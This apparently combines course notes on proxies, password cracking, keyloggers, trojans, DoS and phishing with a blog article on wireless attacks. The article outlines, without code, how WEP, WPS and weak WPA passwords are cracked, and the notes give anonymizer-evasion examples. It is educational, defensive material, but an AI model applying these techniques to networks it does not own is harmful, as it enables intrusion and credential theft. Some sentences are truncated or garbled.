You are on page 1of 27

Proxy server and anonymizer


Proxy server is an intermediary server between client and the internet.

Proxy servers offers the following basic functionalities:

• Firewall and network data filtering.

• Network connection sharing
• Data caching

Proxy servers allow to hide, conceal and make your network id anonymous by hiding your IP

Purpose of Proxy Servers

Following are the reasons to use proxy servers:

• Monitoring and Filtering

• Improving performance
• Translation
• Accessing services anonymously
• Security

Monitoring and Filtering

Proxy servers allow us to do several kind of filtering such as:

• Content Filtering
• encrypted data Filtering
• Bypass filters
• Logging and eavesdropping

Improving performance

It fasten the service by process of retrieving content from the cache which was saved when
previous request was made by the client.


It helps to customize the source site for local users by excluding source content or substituting
source content with original local content.
In this the traffic from the global users is routed to the source website through Translation proxy.

Accessing services anonymously

In this the destination server receives the request from the anonymizing proxy server and thus
does not receive information about the end user.


Since the proxy server hides the identity of the user hence it protects from spam and the hacker

What are the types of proxy ?


Type of Proxies

Forward Proxies
In this the client requests its internal network server to forward to the internet.

Open Proxies
Open Proxies helps the clients to conceal their IP address while browsing the web.

Reverse Proxies
In this the requests are forwarded to one or more proxy servers and the response from the proxy
server is retrieved as if it came directly from the original Server.
Describe the architecture of proxy ?


The proxy server architecture is divided into several modules as shown in the following diagram:

Proxy user interface

This module controls and manages the user interface and provides an easy to use graphical
interface, window and a menu to the end user. This menu offers the following functionalities:
• Start proxy
• Stop proxy
• Exit
• Blocking URL
• Blocking client
• Manage log
• Manage cache
• Modify configuration

Proxy server listener

It is the port where new request from the client browser is listened. This module also performs
blocking of clients from the list given by the user.

Connection Manager
It contains the main functionality of the proxy server. It performs the following functions:

• Read request from header of the client.

• Parse the URL and determine whether the URL is blocked or not.
• Generate connection to the web server.
• Read the reply from the web server.
• If no copy of page is found in the cache then download the page from web server else will
check its last modified date from the reply header and accordingly will read from the cache or
server from the web.
• Then it will also check whether caching is allowed or not and accordingly will cache the page.

Cache Manager
This module is responsible for storing, deleting, clearing and searching of web pages in the cache.

Log Manager
This module is responsible for viewing, clearing and updating the logs.

This module helps to create configuration settings which in turn let other modules to perform
desired configurations such as caching

• 1st attacker connect to proxy server

• Proxy server can allow an attacker to hide ID


How it works ? (diagram)

• An anonymizer or an anonymous proxy is a tool that attempts to make activity on the internet
• It is a proxy server computer that acts as an intermediary and privacy shield between a client
computer and the rest of the Internet.
• It accesses the Internet on the user's behalf, protecting personal information by hiding the
client computer's identifying information.
How it works ?

• Anonymizer's personal VPN routes all your traffic through an encrypted tunnel directly from
your laptop to secure and hardened servers and network.
• Then VPN server mask users REAL IP address to ensure that User have complete and
continuous anonymity for online activities.

Advantages of Anonymizer
While using Anonymizer, your IP address, physical location and browsing are anonymized,
protecting you from:

• Government Oversight
• Hackers (IP Sniffing)
• Unsecured Public Wifi
• Online Activity
• Tracking

Sameer uses an anonymizer to log into an email spoofing website. He then sends out fraudulent
emails to hundreds of people. When the police try to track the IP addresses in the email headers,
they will trace it to the anonymizer and will not be able to track Sameer.


A school in Cochin had banned facebook usage from the computer lab. The school authorities had
configured the firewall in a way that access to the site from school computers was blocked.
Sameer, a student from the 8th grade, used an anonymizer to access facebook from the school.
Password cracking

Manual password cracking ( algorithm )

Password cracking is the process of recovering passwords from data that have been stored in or
transmitted by a computer system.

A common approach (brute-force attack) is to try guesses repeatedly for the password and check
them against an available cryptographic hash of the password.

The purpose of password cracking

• Help a user recover a forgotten password

• To gain unauthorized access to a system,
• or as a preventive measure by System Administrators to check for easily crackable

Manual Password Cracking


• Find a valid user

• Create a list of possible passwords
• Rank the passwords from high probability to low
• Key in each password
• If the system allows you in - Success Else try till success

examples of guessable passwords

• Blank
• Words like "passcode"
• Series of letters "QWERTY"
• User' s name or login name
• Name of the user's friend/relative/pet
• Users birth place. DOB
• Vehicle number, office number..
• Name of celebrity
• Simple modification of one of the preceding.
suffixing I....

Categories of password cracking attacks:

Types of password attack
Weak and strong password

• Online attacks

• Offline attacks

• Non-electronic attacks

• Social engineering
• Shoulder surfing
• Dumpster diving

Online attacks

• An attacker may create a script-automated program- to try each password

• Most popular online attack;- man-in-the-middle attack or bucket-brigade attack
• Used to obtain passwords for E-mail accounts on public websites like Gmail, Yahoo mail
• Also to get passwords for financial Websites .

Offline attacks

• Are performed from a location other than the target where these passwords reside or are used
• Require physical access to the computer and copying the password

Types of Password Attacks

• Password Guessing
Attackers can guess locally or remotely using either a manual or automated approach

• Dictionary attacks
Work on the assumption that most passwords consist of whole words. dates, or taken from a

• Hybrid password
Assume that network administrators push users to make their passwords at least slightly
different from a word that appears in a dictionary.

Weak passwords

• The password contains less than eight characters

• The password is a word found in a dictionary (English or foreign)
• The password is a common usage word such as: Names of family, pets, friends. fantasy
characters. etc.
• Compute terms and names. commands, sites, companies, hardware, software
• The words "<company Name>","sanjose", "sanfran" or any derivation. Birthdays and other
personal information such as addresses and phone numbers.
• word or number patterns like aaabbb, QWERTY, 123321 etc.
• any of the above spelled backwards.

Strong Passwords

• Contain both upper and lower case characters (e.g.. a-z, A-Z)
• Have digits and punctuation characters as well as letters e.g. 0-9,
• Are at least eight alphanumeric characters long.
• Are not a word in any language, slang, dialect, jargon, etc.
• Are not based on personal information, names of family. etc.
• Passwords should never be written down or stored on-line.
• Try to create passwords that can be easily remembered.
• One way to do this is create a password based on a song title, affirmation. or other phrase.
For example, the phrase might be: "This May Be One Way To Remember" and the password could
be: or 'TmbIW!>r~• or some other variation.

Key loggers and spywares

Eg (availability)
Keyloggers recorders (+)

• A keylogger is a technology that tracks and records consecutive key strokes on a keyboard.
• Because sensitive information such as usernames and passwords are often entered on a
keyboard, a keylogger can be a very dangerous technology.

• Keyloggers are often part of malware, spyware or an external virus.

• A keylogger, sometimes called a keystroke logger or system monitor, is a type of surveillance

technology used to monitor and record each keystroke typed on a specific
computer's keyboard.
• Keylogger software is also available for use on smartphones, such as Apple's iPhone and
Android devices.
• Keyloggers are often used as a spyware tool by cybercriminals to steal personally identifiable
information (PII), login credentials and sensitive enterprise data.

• Keylogger recorders may also be used by employers to observe employees' computer

activities, parents to supervise their children's internet usage, users to track possible
unauthorized activity on their devices or law enforcement agencies to analyse incidents
involving computer use.

• These uses are considered ethical or appropriate in varying degrees.

Software-based keyloggers :

• Software-based keyloggers use the target computer's operating system in various ways

• Imitating a virtual machine, acting as the keyboard driver (kernel-based)

• using the application programming interface to watch keyboard strokes (API-based)
• recording information submitted on web-based forms (Form Grabber based) or capturing
network traffic associated with HTTP POST events to steal passwords (Packet analysers).
• Usually consists of two files DLL and EXE

Hardware keyloggers :

• Installing a hardware circuit between the keyboard and the computer that logs keyboard
stroke activity (keyboard hardware).
• Target- ATMs

Acoustic keylogging

• Acoustic keylogging monitors the sound created by each individual keystroke and uses the
subtly different acoustic signature that each key emits to analyse and determine what the
target computer's user is typing.

Anti KeyIogger

• An anti-keylogger (or anti—keystroke logger) is a type of software specifically designed for the
detection of keystroke logger software; often, such software will also incorporate the ability to
delete or at least immobilize hidden keystroke logger software on your computer.

Benefits on anti keylogger

• Keylogger removal - it removes keylogger that are running or being launched in your
computer or mobile.
• Security - it ensures us that confidential information would not be stolen from our hard drives
or computer units, and prevents us from being a victim of cyber crimes and thefts.
Financial institutions are usually targets of keyloggers. Anti loggers perform regular scans in
any computer.
• Key logger detector - apart from disabling feature, the anti-keylogger provides a warning
whenever a key-logging activity is being launched in your unit.
• User friendly and reliable - the anti-keylogger is easy to use and highly reliable.

Innocuous reasons
Antivirus (antispyware)

• Spyware is software that is installed on a computing device without the end user's knowledge.

• Such software is controversial because even though it is sometimes installed for relatively
innocuous (not meant to cause harm) reasons, it can violate the end user's privacy and has
the potential to be abused.

Spyware that is installed for innocuous reasons is sometimes referred to as tracking software.
• In the workplace, such software may be installed on corporate laptops to monitor employees'
browsing activities.
• In the home, parents might install a keystroke logger to monitor their children's activity on the
• Or an advertiser might use cookies to track what webpages a user visits in order to target
advertising in a contextual marketing campaign.

If the end user is told that data is being collected and has the ability to learn with whom the data is
being shared, such data collection programs are not considered spyware.

• When tracking software is abused, there can be a significant impact on privacy.

• For example, if a smartphone gets infected with mobile spyware that was sideloaded with a
third party app, the phone's camera and microphone can be used to spy on nearby activity,
record phone calls, log browsing activity and keystrokes, and monitor the phone owner's

Spyware can be difficult to detect :

• The first indication a user has that a computing device has been infected with spyware is a
noticeable reduction in processor or network connection speeds and in the case of mobile
devices -- data usage and battery life.

• Antivirus software that includes antispyware protection should be used to find and remove
• To prevent spyware, users should only download software from trusted sources, read all
disclosures when installing software, avoid clicking on pop-up ads and stay current with
updates and patches for browser, operating system and application software.
Trojan Horse and Backdoors

Purpose and use
How computers are affected ?

• A Trojan horse, or Trojan, in computing is any malicious computer program which

misrepresents itself as useful, routine, games, application or interesting in order to persuade
a victim to install it.
• The term is derived from the Ancient Greek story of the wooden horse that was used to help
Greek troops sneak invading the city of Troy.
• Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves
into other files or otherwise propagate themselves.

Purpose and use of trojan


• Crashing the computer or device, Modification or deletion of files, Data corruption

• Formatting disks, destroying all contents.

Use of resources or identity

• Use of the machine as part of a botnet (e.g. to perform automated spamming or to distribute
Denial-of-service attacks).
• Using computer resources for mining cryptocurrencies
• Using the infected computer as proxy for illegal activities and/or attacks on other computers.
• Infecting other connected devices on the network.

Money theft, ransom

• Electronic money theft.

• Installing ransomware such as Crypto Locker.


• A site offers a free download to a program or game that normally costs money. Downloading
the pirated version of a program or game allows you to illegally use or play, however, during
the install it also installs a trojan horse onto the computer.
• You receive an e-mail that appears to be from a friend asking you to view this fantastic new
program or look at a file. Opening the file infects your computer with a trojan horse virus.
• A popular screen saver website has become infected or uploaded infected screen savers.
Downloading the screen saver to your computer also installs a trojan horse onto the

Example of trojan are Beast, Zeus, Sub7


How it works ?
Eg and illustration
Detection and prevention

• A backdoor is a technique in which a system security mechanism is bypassed undetectably to

access a computer or its data.
• The backdoor access method is sometimes written by the programmer who develops a
• A backdoor is also known as a trapdoor.
• A developer may create a backdoor so that an application or operating system can be
accessed for troubleshooting or other purposes.
• However, attackers often use backdoors that they detect or install themselves as part of
an exploit.
• In some cases, a worm or virus is designed to take advantage of a backdoor created by an
earlier attack.

How backdoors work

• Backdoors can vary widely. Some, for example, are put in place by legitimate vendors, while
others are introduced inadvertently as a result of programming errors.
• Developers sometimes use backdoors during the development process, which are then not
removed from production code.
• Backdoors are also commonly put into place through malware.
• A malware module may act as a backdoor itself, or it can act as a first-line backdoor, which
means that it acts as a staging platform for downloading other malware modules that are
designed to perform the actual attack.
• Encryption algorithms and networking protocols may also, at least potentially, contain

• For example, in 2016, researchers described how the prime numbers used in encryption
algorithms could be crafted in such a way that could enable an adversary to factor
the primes -- and thereby break the encryption -- of encryption algorithms previously thought
to be secure.

• In 2014, an approach to random number generation called Dual_EC_DRBG (Dual Elliptic Curve
Deterministic Random Bit Generator) was found to have a fault in it that made its resulting
random seed numbers somewhat predictable.

• The security community's consensus was that the NSA allowed the standard to be used, even
though it knew there was a weakness, so that they could use it as a backdoor.
Detection and prevention

• Backdoors can be very difficult to detect, and detection methods vary considerably depending
on the computer's operating system.

• In some cases, antimalware software may be capable of detecting backdoor software.

• In other cases, security professionals may need to use specialized tools to detect backdoors,
or use a protocol monitoring tool to inspect network packets.

There are several different strategies for avoiding backdoor attacks.

• First and foremost, organizations need to aware to security best practices, such as avoiding
untrusted software and ensuring that every device is protected by a firewall.
• Application firewalls can also help to prevent backdoor attacks, since they restrict the traffic
that can flow across open ports.
• It is also important to monitor network traffic for signatures that may indicate the presence of
a backdoor.

DOS AND DOS attack

Two methods of DOS attacks (flooding and crashing)
DDOS attack

• A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,

making it inaccessible to its intended users.
• DoS attacks accomplish this by flooding the target with traffic, or sending it information that
triggers a crash.
• In both instances, the DoS attack deprives legitimate users (i.e. employees, members, or
account holders) of the service or resource they expected.
• Victims of DoS attacks are web servers of high-profile organizations such as banking,
commerce, and media companies, or government and trade organizations.
• Though DoS attacks do not typically result in the theft or loss of significant information or
other assets, they can cost the victim a great deal of time and money to handle.
There are two general methods of DoS attacks: flooding services or crashing services.
• Flood attacks occur when the system receives too much traffic for the server to buffer,
causing them to slow down and eventually stop.
• Popular flood attacks include:
• Buffer overflow attacks – the most common DoS attack. The concept is to send more traffic
to a network address than the programmers have built the system to handle. It includes the
attacks listed below, in addition to others that are designed to exploit bugs specific to certain
applications or networks
• ICMP flood – leverages misconfigured network devices by sending spoofed packets that ping
every computer on the targeted network, instead of just one specific machine. The network is
then triggered to amplify the traffic. This attack is also known as the smurf attack or ping of

• SYN flood – sends a request to connect to a server, but never completes the handshake.
Continues until all open ports are saturated with requests and none are available for
legitimate users to connect to.

Other DoS attacks simply exploit vulnerabilities that cause the target system or service to crash.
In these attacks, input is sent that takes advantage of bugs in the target that subsequently crash or
severely destabilize the system, so that it can’t be accessed or used.

An additional type of DoS attack is the Distributed Denial of Service (DDoS) attack.
A DDoS attack occurs when multiple systems orchestrate a synchronized DoS attack to a single
The essential difference is that instead of being attacked from one location, the target is attacked
from many locations at once. The distribution of hosts that defines a DDoS provide the attacker
multiple advantages:
• He can leverage the greater volume of machine to execute a seriously disruptive attack
• The location of the attack is difficult to detect due to the random distribution of attacking
systems (often worldwide)
• It is more difficult to shut down multiple machines than one
• The true attacking party is very difficult to identify, as they are disguised behind many (mostly
compromised) systems

Modern security technologies have developed mechanisms to defend against most forms of DoS
attacks, but due to the unique characteristics of DDoS, it is still regarded as an elevated threat and is
of higher concern to organizations that fear being targeted by such an attack.

How does phishing work?
What are the dangers of phishing attacks?
How do I protect against phishing attacks?

• Phishing is the practice of sending fraudulent communications that appear to come from a
reputable source. It is usually done through email.

• The goal is to steal sensitive data like credit card and login information, or to
install malware on the victim’s machine.
• Phishing is a common type of cyber attack that everyone should learn about in order to
protect themselves.

How does phishing work?

• Phishing starts with a fraudulent email or other communication that is designed to lure a
• The message is made to look as though it comes from a trusted sender.
• If it fools the victim, he or she is coaxed into providing confidential information, often on a
scam website.
• Sometimes malware is also downloaded onto the target’s computer.

What are the dangers of phishing attacks?

• Sometimes attackers are satisfied with getting a victim’s credit card information or other
personal data for financial gain.
• Other times, phishing emails are sent to obtain employee login information or other details
for use in an advanced attack against a specific company.
• Cybercrime attacks such as advanced persistent threats (APTs) and ransomware often start
with phishing.

How do I protect against phishing attacks?

User education
• One way to protect your organization from phishing is user education. Education should
involve all employees.
• High-level executives are often a target. Teach them how to recognize a phishing email and
what to do when they receive one.
• Simulation exercises are also key for assessing how your employees react to a staged phishing

Security technology
• No single cybersecurity technology can prevent phishing attacks. Instead, organizations must
take a layered approach to reduce the number of attacks and lessen their impact when they
do occur.
• Network security technologies that should be implemented include email and web security,
malware protection, user behaviour monitoring, and access control.
Got Phished by Mistake?

What to do in case you think that by mistake, you got phished? In such a case, you can take the
following measures −
• Change the passwords immediately of the account that you think has been hacked.
• Check if any money has been withdrawn or any payment done through your account. You can
contact your financial institution directly for this.
• Contact the authority on whose behalf you got that email. You should also report to your
account administrator.

Types of phishing attacks

• Deceptive
• Spear
• Whaling
• Pharming
• Voice
• Email/link
• Chat phishing
• Prevention of phishing

Deceptive phishing
• Deceptive phishing is the most common type of phishing. In this case, an attacker attempts
to obtain confidential information from the victims.
• Attackers use the information to steal money or to launch other attacks.
• A fake email from a bank asking you to click a link and verify your account details is an
example of deceptive phishing.
Boost your email security (1:49 min)

Spear phishing
• Spear phishing targets specific individuals instead of a wide group of people.
• Attackers often research their victims on social media and other sites. That way, they can
customize their communications and appear more authentic.
• Spear phishing is often the first step used to penetrate a company’s defences and carry out a
targeted attack.

• When attackers go after a “big fish” like a CEO, it’s called whaling.
• These attackers often spend considerable time profiling the target to find the opportune
moment and means of stealing login credentials.
• Whaling is of particular concern because high-level executives are able to access a great deal
of company information.
• Similar to phishing, pharming sends users to a fraudulent website that appears to be
legitimate. However, in this case, victims do not even have to click a malicious link to be taken
to the bogus site.
• Attackers can infect either the user’s computer or the website’s DNS server and redirect the
user to a fake site even if the correct URL is typed in.
Phishing techniques
Types of Wireless Network Attacks
Our modern networks are increasingly moving towards wireless technologies. As convenient as
they are, wireless connections have one major drawback – security. Compared to their wired
counterparts, securing wireless technologies poses a bit of an extra challenge.

My main focus for this article will be security over WiFi access, but I’ll address 3G/4G and Bluetooth
as well. Read on to learn about the methods that hackers use to steal data and what you can do to
keep them out.

In a wired network, packets of information are transferred along a physical medium, such as a
copper cable or fiber optics. In a wireless setup, your data is quite literally broadcast through the
air around you. Furthermore, physical access is not required to gain access to a network. What this
means is that cyber criminals now have new ways to wreak havoc on your network infrastructure.
Let’s take a look at these wireless attacks.


Wireless Attacks can come at you through different methods. For the most part you need to worry
about WiFi. Some methods rely on tricking users, others use brute force, and some look for people
who don’t bother to secure their network. Many of these attacks are intertwined with each other
in real world use. Here are some of the kinds of attacks you could encounter:

• Packet Sniffing: When information is sent back and forth over a network, it is sent in what we
call packets. Since wireless traffic is sent over the air, it’s very easy to capture. Quite a lot of
traffic (FTP, HTTP, SNMP, etc.) is sent in the clear, meaning that there is no encryption and
files are in plain text for anyone to read. So using a tool like Wireshark allows you to read data
transfers in plain text! This can lead to stolen passwords or leaks of sensitive information quite
easily. Encrypted data can be captured as well, but it’s obviously much harder for an attacker
to decipher the encrypted data packets.
• Rouge Access Point: When an unauthorized access point (AP) appears on a network, it is
refereed to as a rouge access point. These can pop up from an employee who doesn’t know
better, or a person with ill intent. These APs represent a vulnerability to the network because
they leave it open to a variety of attacks. These include vulnerability scans for attack
preparation, ARP poisoning, packet captures, and Denial of Service attacks.
• Password Theft: When communicating over wireless networks, think of how often you log
into a website. You send passwords out over the network, and if the site doesn’t use SSL or
TLS, that password is sitting in plain text for an attacker to read. There are even ways to get
around those encryption methods to steal the password. I’ll talk about this with man in the
middle attacks.
• Man in the Middle Attack: It’s possible for hackers to trick communicating devices into
sending their transmissions to the attacker’s system. Here they can record the traffic to view
later (like in packet sniffing) and even change the contents of files. Various types of malware
can be inserted into these packets, e-mail content could be changed, or the traffic could be
dropped so that communication is blocked.
• Jamming: There are a number of ways to jam a wireless network. One method is flooding an
AP with de-authentication frames. This effectively overwhelms the network and prevents
legitimate transmissions from getting through. This attack is a little unusual because there
probably isn’t anything in it for the hacker. One of the few examples of how this could benefit
someone is through a business jamming their competitors WiFi signal. This is highly illegal (as
are all these attacks), so businesses would tend to shy away from it. If they got caught they
would be facing serious charges.
• War Driving: War driving comes from an old term called war dialling, where people would dial
random phone numbers in search of modems. War driving is basically people driving around
looking for vulnerable APs to attack. People will even use drones to try and hack APs on higher
floors of a building. A company that owns multiple floors around ten stories up might assume
nobody is even in range to hack their wireless, but there is no end to the creativity of hackers!
• Bluetooth Attacks: There are a variety of Bluetooth exploits out there. These range from
annoying pop up messages, to full control over the a victims Bluetooth enabled device. Check
out this blog post on hacking Bluetooth for an in depth look.
• WEP/WPA Attacks: Attacks on wireless routers can be a huge problem. Older encryption
standards are extremely vulnerable, and it’s pretty easy to gain the access code in this case.
Once someone's on your network, you’ve lost a significant layer of security. APs and routers
are hiding your IP address from the broader Internet using Network Address
Translation(unless you use IPv6 but that’s a topic for another day). This effectively hides your
private IP address from those outside your subnet, and helps prevent outsiders from being
able to directly attack you. The keyword there is that it helps prevent the attacks, but doesn’t
stop it completely.
Another thing to take note of, is that our mobile devices are at risk whenever they connect to
public WiFi. Whether you use a phone, tablet, or laptop; accessing an insecure network is putting a
target on your data. Understand the risks or consider using a VPN.

If you are in an area where other businesses or homes are in close proximity, you could encounter
attempts of an attacker trying to steal WiFi credentials and gain access. This can be problematic on
many levels, as a hacker might not stop at using your internet for free. Once inside your subnet,
any connected device is vulnerable. This can get especially troublesome if you happen to have
security cameras in your house that are connected to your wireless network. This kind of attack
often happens with WEP encryption, as it is much easier to crack than WPA/WPA2. Of course, a
determined hacker can likely find a way in regardless of what encryption you use

While WPA/WPA2 are far more secure than WEP. If you have WPS enabled I can gain access pretty
quick with a tool like Reaver. Even if you have followed the guidelines above, there’s still a chance I
can get in your wireless network.

Warning: Because the following contains information that could be used for illegal purposes, I want
to really drill this into your head: hacking a network you do not own or have permission to attack
is multiple felonies! This information is for educational purposes, particularly for aspiring cyber
security professionals. If you are convicted of a felony you can be put into prison, fined heavily, you
lose your right to vote, cannot own a firearm legally, and you now have to disclose your status as a
convicted felon to future employers.
If you don’t have a place to practice legally, find one or make your own. Save up some cash and
build a test lab inside your home. It doesn’t need to be expensive. If you happen to be in the
Columbia MD area, I can refer you to Howard Community College’s cyber defence lab. You may
need to register as a student to use the facility though.

With that legal disclaimer in mind, let’s look at some of the techniques used to crack wireless
router passwords.

Hacking WEP, WPS, and WPA/WPA2

WEP: If I’m honest, if you have WEP encryption you may as well name your SSID “Free WiFi” and
disable the password. All I have to do is set my laptops wireless card to monitoring mode (not all
wireless cards are capable of this) and see what APs are around. From here I focus in on the one I
want to hack and start capturing packets and storing them into a file. If you happen to have WEP on
your wireless setup (I hope not!) or you have an old wireless router laying around that you can
setup to practice on, check out this tutorial for hacking WEP.

After around 10,000 packets (This doesn’t take as long as you may think) I take a shot at using a
tool to crack it. If it doesn’t work I wait until I have more packets and try again. In a fairly short
period of time I have a password in front of me, and access to your router. The only defense against
this attack is to upgrade to WPA/WPA2 (preferably WPA2)

WPS: This takes a few more steps. If WPS is enabled on your WPA2 router it’s almost as vulnerable
as one using WEP!!This article on Ars Technica will give you an in-depth look at hacking WPS. If you
own a router with WPS enabled see if you can follow along. To defend yourself from this, turn off
WPS on your wireless router.

WPA/WPA2: These are far more secure than WEP so long as WPS is turned off. Of course, there is
still a way in. If you have a weak password, I can perform a brute force attack with a password file.
Essentially, there are massive lists of already cracked passwords, words from the dictionary, default
credentials, and common password variations available on the internet. In fact, Kali Linux has one
built in. Of course, this method requires time, or some serious computing power. The more
complex your password is, the longer this process takes. Essentially what you want to do is delay a
hacker for so long that they get bored and give up.

There is another WPA2 exploit. When a router is deauthenticating and forcing a device offline to
reauthenticate with a new key, there is a short opening that can be exploited. You could configure
your access point to use MAC filtering to stop this, but if the attacker is skilled enough to perform
this they will easily spoof your MAC address.


Now that you don’t trust anything on the Internet anymore, let’s build that confidence back up.
There are a lot of ways to make yourself less susceptible to wireless attacks.

• Use WPA2 security: This takes enough work to crack that most hackers will look for an easier
target. Make sure WPS is turned off!
• Minimize Your Networks Reach: Try to position your router in the center of your home or
building. There are tools available to measure the reach of your network, and you can adjust
the signal level. Try to make it so that the signal beyond your walls is degraded enough that it
isn’t usable. You may also consider using a directional antennae if central placement is not an
• Use Firewalls: Make sure your APs firewall is enabled. If you can afford a hardware firewall and
feel you need the extra security, go ahead and install one. Household networks generally can
get away with the standard router firewall, and operating system firewalls.
• Use a VPN on Open Networks: If you really must use public WiFi, set up a VPN. Most
smartphones have this capability. You can set one up on your PC. This allows you to
communicate through an encrypted tunnel back to your home or office. You can even send
web traffic through a VPN.
• Update Software and Firmware: Keep your system up to date with the latest patches, and
make sure any online applications you use are updated as well. Check for AP firmware
updates related to security flaws, and implement them as soon as possible. Remember to
follow best practices for network modification to ensure you don’t interrupt a critical task.
Check out your updates in a test lab to make sure that they don’t interfere with an important
application. Don’t perform updates during normal operating hours if possible, and if you must
update during work hours make sure everyone is aware that network connectivity could slow
down, or be cut off temporarily while you work.
• Use Strong Passwords: I recommend you use at least a 15 character password.Use a mix of
upper/lowercase letters, numbers, and symbols. Again, don’t make it easy. Is the only capital
letter at the start? Is there an exclamation at the end? Are there any words in there? These
are common bad password practices, and hackers love them.
• Change the Login Credentials: Make sure you change the administrative login credentials. This
is often something like admin/admin or admin/password by default.
• Disable your SSID (service set identifier) Broadcast: This isn’t a security measure. The right tools
will still find your network’s SSID (this is the name of your network in case you didn’t know).
However, there’s a small chance it could help your network fly under the radar.
• Enable MAC Filtering: Again, MAC filtering is not security. A knowledgeable hacker knows how
to monitor your network and copy the MAC address of a connected device. They can then
spoof their own MAC to appear as an authorized device to gain access. However, this is
another annoyance for them to deal with.
It’s a good idea to monitor your network connections to look for unusual activity. If you have an
Android phone you can use this free network IP scanner to see the IP addresses of connected
devices. Desktops can use something like the nmap tool. For a home network with few devices, you
want to find out what your devices IP addresses currently are, and see if there are any that don’t
match. Be aware that if your Wi-Fi uses DHCP (automatically assigned IP’s) that these could change
over time.

Note that your router has an IP as well, most likely it will be either or but it
may vary according to your setup.

There are a lot of ways for hackers to come after your data, but taking these simple precautionary
measures, and proactively monitoring for threats can make a world of difference.